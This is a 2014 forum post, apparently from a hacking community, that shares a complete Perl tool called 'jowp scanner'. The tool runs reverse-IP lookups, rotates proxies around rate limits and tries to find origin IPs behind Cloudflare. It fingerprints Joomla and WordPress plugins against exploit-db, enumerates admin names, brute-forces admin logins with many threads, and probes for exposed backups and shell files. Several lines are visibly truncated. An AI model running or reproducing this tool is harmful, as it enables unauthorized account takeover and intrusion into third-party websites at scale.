sQuo Posted May 3, 2014 Share Posted May 3, 2014 This is the hidden content, please Sign In or Sign Up [HIDE-THANKS] [LENGUAJE=perl]#!/usr/bin/perl # jowp scanner 0.1 # © sec4ever use LWP::UserAgent; use WWW::Mechanize; use threads; $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5"); $ua->timeout(30); $defext = "php"; $| = 1; $threads = 10; head(); print "[+] Enter ip - site[(s) file] : "; $choice=; chomp($choice); if ($choice =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) { print " + you're entering an ip address : ".$choice."\n"; dojob($choice); } elsif($choice =~ /\.txt/) { print " + you are entering a file : ".$choice."\n"; open(sites, " @sites=; close(sites); print " + Total Sites : ".scalar(@sites)."\n"; }else{ print " + you are entering a site : ".$choice."\n"; $ip = getip($choice); print " + ip : ".$ip."\n"; dojob($ip); } sub dojob { ureverse($_[0]); open(sites, " @sites=; close(sites); } foreach $site (@sites) { chomp($site); $main = $ua->get("http://".$site."/")->content; if ($main =~ m/joomla/ || $main =~ m/\/component\// || $main =~ m/com\_/) { print " * ".$site." joomla\n"; scanjoomla($site); brutjoomla($site); check($site); } elsif ($main =~ /wordpress/ || $main =~ /wp\-content/ || $main =~ /wp\-includes/) { print " * ".$site." wordpress\n"; scanwordpress($site); brutwordpress($site); check($site); }else{ print " * ".$site." 
unknown\n"; check($site); } } sub check { checkdirs($_[0]); checkcommon($_[0]); } sub ureverse { reversesned: $response = $ua->post("http://domains.yougetsignal.com/domains.php", { remoteAddress => $_[0]}); $pwnd = $response->content; if ($pwnd =~ /Daily reverse IP check limit reached for/) { print " - limit reached, bypassing ...\n"; $getproxy = gproxy(); $ua->proxy('http', $getproxy); goto reversesned; }elsif ($pwnd =~ /\"domainCount\":\"(.*?)\"/){ print " + Total Sites : ".$1."\n"; while ($pwnd =~ m/\[\"(.*?)\",/sg){ $group{$1} = undef; } foreach $s (keys %group) { savefile("sites-".$_[0].".txt",$s); } } } sub gproxy { open(DAT,"proxies.txt"); @proxys=; close(DAT); foreach $proxy (@proxys) { chomp($proxy); $proxy = "http://".$proxy if ($proxy !~ m/http:\/\//); $ua->proxy('http', $proxy); if ($ua->get("http://domains.yougetsignal.com/domains.php")->content !~ /Daily reverse IP check limit reached for/) { print "+ ".$proxy." valid \n"; $ua->proxy('http', $proxy); return $proxy; } } } sub getip { $getip = $ua->get("http://".$_[0]."/"); $getiphead = $getip->headers()->as_string; if ($getiphead =~ /Server: cloudflare-nginx/) { print " + Cloudflare Detected , bypassing ...\n"; cloudbypass($_[0]); subdom($_[0]); print "\n * Enter an ip to use : "; chomp($nip=); return $nip; }elsif ($getiphead =~ /Client-Peer: (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}):/) { chomp($1); return $1; } else{ $!; print " error here 1\n"; } } sub cloudbypass{ my $cloudbypass = $ua->post("http://www.cloudflare-watch.org/cgi-bin/cfsearch.cgi", { cfS => $_[0], }); if ($cloudbypass->content =~ m/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/){ chomp($1); print " + method 1, ip : ".$1."\n"; }else{ print " - Can't, using method 2 \n"; } } sub subdom { open(subs,"subs.txt"); @subs=; close(subs); foreach $sub (@subs) { chomp($sub); $getsub = $ua->get("http://".$sub.".".$_[0]."/"); $getsubhead = $getsub->headers()->as_string; if ($getsubhead !~ /Client-Warning: Internal response/) { if ($getsubhead !~ /Server: 
cloudflare-nginx/) { print " + ".$sub.".".$_[0]." "; print $getsubhead =~ /Client-Peer: (.*?):/ ? $1."\n" : " can't get ip\n"; } else { print " + ".$sub.".".$_[0]." "; print $getsubhead =~ /Client-Peer: (.*?):/ ? $1." is under cloudflare\n" : " can't get ip\n"; } }else{ print " - ".$sub.".".$_[0]." not found\n"; } } } sub scanjoomla { $scanjoom = $ua->get("http://".$_[0]."/index.php"); $scanjoomcont = $scanjoom->content; while ($scanjoomcont =~ /\/components\/(.*?)\//gi){$compo1{$1} = undef;} while ($scanjoomcont =~ /\?option=(.*?)\&\;/gi){$compo2{$1} = undef;} while ($scanjoomcont =~ /\/component\/option\,(.*?)\//gi){$compo3{$1} = undef;} while ($scanjoomcont =~ /\/index\.php\/component\/(.*?)\//gi){$compo4{$1} = undef;} #\/index\.php\/component\/(.*?)\/ foreach $com1 (keys %compo1) {push(@compo,$com1);} foreach $com2 (keys %compo2) {push(@compo,$com2);} foreach $com3 (keys %compo3) {push(@compo,$com3);} foreach $com4 (keys %compo4) {push(@compo,$com4);} print " + components \n"; foreach $com (uniq(@compo)) { print "\t\t# ".$com." : "; checkexdb($com); } print "\n"; } sub scanwordpress { #preg_match_all('#/wp-content/plugins/(.*?)/#si', $metals , $amks ); #preg_match_all('##si', $metals , $amks2 ); # $scanwp = $ua->get("http://".$_[0]."/"); $scanwpcont = $scanwp->content; while ($scanwpcont =~ /\/wp\-content\/plugins\/(.*?)\//gi){$plug1{$1} = undef;} if ($scanwpcont =~ /\/wp\-content\/themes\/(.*?)\//gi){push(@plug,$1);} foreach $plu1 (keys %plug1) {push(@plug,$plu1);} print " + plugin \n"; foreach $plu (uniq(@plug)) { print "\t\t# ".$plu." 
: "; checkexdb($plu); } print "\n"; } sub checkexdb { $checkexdbex = $ua->get("http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".$_[0]."&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve"); $checkexdbexcont = $checkexdbex->content; #s http://www.exploit-db.com/exploits/'>http://www.exploit-db.com/exploits/ my %checkjoomex; if ($checkexdbexcont !~ /\">No results/) { while ($checkexdbexcont =~ m/\/exploits\/(.*?)[\n]?/gi) { $checkjoomex{$1} = undef; } foreach $ex (keys %checkjoomex) { @ex = split(/">/,$ex); print "\n\t\t\t ".@ex[1]."\n"; print "\t\t\t http://www.exploit-db.com/exploits/".@ex[0]."\n"; } } else { print "no exploit\n"; } @ex = undef; } sub brutwordpress { @usrs = undef; @pwds = undef; print " + bruteforcing (threads: $threads)\n"; $bwpred = "http://".$_[0]."/wp-admin/"; $bwpu = getadminwp($_[0]); if (length($bwpu) print " - faild to get admin name, using list\n"; open (usr, " @usrs = ; close usr; @usergenwp = split(/\./,$_[0]); push(@usrs,$_[0]); push(@users,@usergenwp[0]); }else{ print " + found admin name : ".$bwpu."\n"; @usrs = ($bwpu); } open (pwd, " @pwds = ; close pwd; @passgenwp = split(/\./,$_[0]); push(@pwds,@passgenwp[0]); foreach $usr (@usrs) { foreach $pwd (@pwds) { chomp($usr); chomp($pwd); push(@threads, threads->create (\&bfwp2, $_[0],$usr,$pwd,$bwpred)); sleep(1) while(scalar threads->list(threads::running) >= $threads); } } $_->join foreach @threads; @threads = (); } sub bfwp2 { eval { $wpbf = WWW::Mechanize->new(timeout => 10); $wpbf->get("http://".$_[0]."/wp-login.php"); $wpbf->submit_form( fields => { "log" => $_[1], "pwd" => $_[2], "redirect_to" => $_[3], "testcookie" => "1",}); }; if($wpbf->content() =~ /wp-admin\/load-styles/){ print "\t# cracked, user: ".$_[1]." pass: ".$_[2]."\n"; }else{ print "\t- faild, user: ".$_[1]." 
pass: ".$_[2]; print "\n"; } } sub brutjoomla { @usrs = undef; @pwds = undef; print " + bruteforcing (threads: $threads)\n"; $jotoken = getjooken($_[0]); open (usr, " @usrs = ; close usr; open (pwd, " @pwds = ; close pwd; push(@usrs,$_[0]); push(@pwds,$_[0]); @authgen = split(/\./,$_[0]); push(@usrs,@authgen[0]); push(@pwds,@authgen[0]); foreach $usr (@usrs) { foreach $pwd (@pwds) { chomp($usr); chomp($pwd); push(@threads, threads->create (\&bfjo2, $_[0],$usr,$pwd,$jotoken)); sleep(1) while(scalar threads->list(threads::running) >= $threads); } } $_->join foreach @threads; @threads = (); } sub bfjo2 { eval { $jobfr = WWW::Mechanize->new(timeout => 10); $jobfr->get("http://".$_[0]."/administrator/index.php"); $jobfr->submit_form( fields => { username => $_[1], passwd => $_[2], task => 'login', $_[3] => '1', }); }; if($jobfr->content() =~ /com_categories/i || $jobfr->content() =~ /com_config/i || $jobfr->content() =~ /com_admin/i){ print "\t# cracked, user: ".$_[1]." pass: ".$_[2]."\n"; }else{ print "\t- faild, user: ".$_[1]." pass: ".$_[2]; } print "\n"; } sub getadminwp { $getadmin = $ua->get("http://".$_[0]."?author=1"); $getadminhead = $getadmin->headers()->as_string; $getadmincont = $getadmin->content; if ($getadmincont =~ /(.*?) \| /) { chomp($1); return($1); }elsif ($getadminhead =~ /Title: (.*?) /) { chomp($1); return($1); } } sub checkdirs { print " + scanning dirs \n"; open (dir, " @dirs = ; close dir; $countd=0; @tocheckfiles = undef; foreach $dir (@dirs) { chomp($dir); $countd++; $scanp = $ua->get("http://".$_[0]."/".$dir."/"); if ($scanp->status_line !~ /404/){ if ($scanp->status_line =~ /Bad hostname\)/) { print "\t - cant connect to site\n";}else{ print "\r\t ".$countd."/".scalar(@dirs)." + found : http://".$_[0]."/".$dir."/ ".$scanp->status_line."\n"; push(@tocheckfiles,$dir); }} else{ print "\r\t ".$countd."/".scalar(@dirs)." 
- not found : http://".$_[0]."/".$dir."/ "; } } print "\n"; foreach $tocheckdir (uniq(@tocheckfiles)) {checkfiles($_[0],"/".$tocheckdir);} } sub checkfiles { # bam bam ;) print " + scanning files for dir : ".$_[1]."\n"; open (path, " @paths = ; close path; $countp=0; $scanpi = $ua->get("http://".$_[0]."/"); $scanphead = $scanpi->headers()->as_string; if ($scanphead =~ /X-Powered-By\: PHP/){@ext = ("php");print "\t using extention : php for files\n";}elsif($scanphead =~ /X-Powered-By\: ASP\.NET/){ @ext = ("aspx","asp"); print "\t using extention : aspx,asp for files\n"; }else{@ext = ($defext); print "\t using default extention : ".$defext." for files\n";} foreach $filescan (@paths) { chomp($filescan); $countp++; foreach $fext (@ext) { $scanp = $ua->get("http://".$_[0].$_[1]."/".$filescan.".".$fext); if ($scanp->status_line !~ /404/){ if ($scanp->status_line =~ /Bad hostname\)/) { print "\t - cant connect to site\n";}else{ print "\r\t ".$countp."/".scalar(@paths)." + found : http://".$_[0].$_[1]."/".$filescan.".".$fext." ".$scanp->status_line."\n"; } } else{ print "\r\t ".$countp."/".scalar(@paths)." - not found : http://".$_[0].$_[1]."/".$filescan.".".$fext; } } } print "\n"; } sub checkcommon { print " + scanning common files \n"; @cpaths = ("validator.php","uploader.php","vbseo.php","test.txt","test.zip","public_html.zip","pulic_html.rar","public_html.tar.gz","backup.zip","backup.tar.gz",".bash_history","error_log","domlogs"); $countcp=0; foreach $filecscan (@cpaths) { chomp($filecscan); $countcp++; $scanpc = $ua->get("http://".$_[0]."/".$filecscan); if ($scanpc->status_line !~ /404/){ if ($scanpc->status_line =~ /Bad hostname\)/) { print "\t - cant connect to site\n";}else{ print "\r\t ".$countcp."/".scalar(@cpaths)." + found : http://".$_[0]."/".$filecscan." ".$scanpc->status_line."\n"; } } else{ print "\r\t ".$countcp."/".scalar(@cpaths)." 
- not found : http://".$_[0]."/".$filecscan; } } print "\n"; } sub getjooken { $gjotoken = WWW::Mechanize->new(); $gjotoken->get("http://".$_[0]."/administrator/index.php"); if($gjotoken->content() =~ /([0-9a-fA-F]{32})/){ print " + found token \n"; chomp($1); return $1; } else { print " - can't get token \n"; next; } } sub savefile { open (save,">>".$_[0]); print save $_[1]."\n"; close save; } sub uniq { return keys %{{ map { $_ => 1 } @_ }}; } sub head { print qq { [+] jowp scanner 0.1 [+] © sec4ever } }[/LENGUAJE][/HIDE-THANKS] Link to comment Share on other sites More sharing options...